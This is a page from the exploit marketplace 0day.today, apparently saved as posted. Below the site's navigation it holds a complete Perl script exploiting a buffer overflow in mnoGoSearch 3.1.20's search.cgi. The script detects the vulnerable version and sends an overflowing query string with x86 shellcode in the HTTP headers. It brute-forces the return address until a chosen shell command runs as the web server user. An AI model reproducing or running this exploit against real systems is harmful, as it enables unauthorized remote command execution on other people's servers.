0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
mnoGoSearch 3.1.20 Remote Command Execution Exploit
[===================================================
mnoGoSearch 3.1.20 Remote Command Execution Exploit
===================================================
#!/usr/bin/perl
#
# [ reloaded ]
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#
use IO::Socket;
$host = "127.0.0.1";
$cmd = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;
my $conn;
if ($ARGV[0]){
$host = $ARGV[0];
}
else {
print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";
print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
print "\thost\thostname to exploit\n";
print "\tcommand\tcommand to execute on server\n";
print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
print "\tport\tport to connect to\n";
print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
print "\tret\treturn address default bfffd0d0\n";
exit;
}
if ($ARGV[1]){
$cmd = $ARGV[1];
}
if ($ARGV[2]){
$searchpath = $ARGV[2];
}
if ($ARGV[3]){
$port = int($ARGV[3]);
}
if ($ARGV[4]){
$suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
$rawret = hex_to_int($ARGV[5]);
}
#########~~ start function ~~#########
sub hex_to_int {
my $hs = $_[0];
$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
(hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
}
sub int_to_hex {
my $in = $_[0];
$hex = sprintf "%x",$in;
}
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die "[*] incorrect return address ...\n ";
} else {
$ret = chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
$ret .= chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
}
}
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub check_version {
my $result;
connect_to();
print "[x] Check if $host use correct version ...\n";
print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /_test_/){
print "[x] Correct version detected .. possibly vulnerable ...\n";
} else {
print $result;
die "[x] New version or wrong url\n";
}
}
sub exploit {
my $rw = $_[0];
$result = "";
# linux ix86 shellcode rip from phx.c by proton
$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
."\x41\x41"
."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
."$cmd"
."@";
$strret = int_to_hex($rw);
$ret = string_to_ret($strret);
$envvar = 'B' x (4096 - length($shellcode));
$envvar .= $shellcode;
# generate query string
$buffer = "B" x $suffsize;
$buffer .= "B" x 4800;
$buffer .= $ret x 200;
$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
."Accept: $envvar\n"
."Accept-Language: $envvar\n"
."Accept-Encoding: $envvar\n"
."User-Agent: Mozilla/4.0\n"
."Host: $host\n"
."Connection: Close\n\n";
&connect_to;
print "[x] Sending exploit code ..\n";
print "[x] ret: $strret\n";
print "[x] suf: $suffsize\n";
print "[x] length:",length($request),"\n";
print $conn "$request";
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
}
sub check_result {
if ($result =~ /hello/ && !($result =~ /text\/html/)){
print $result;
$success = 1;
} else {
print $result;
print "[*] Failed ...\n";
$success = 0;
}
}
#########~~ end function ~~#########
&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
&exploit($rawret);
&check_result;
if ($success == 1){
exit;
}
sleep 1;
}
# 0day.today [2024-11-16] #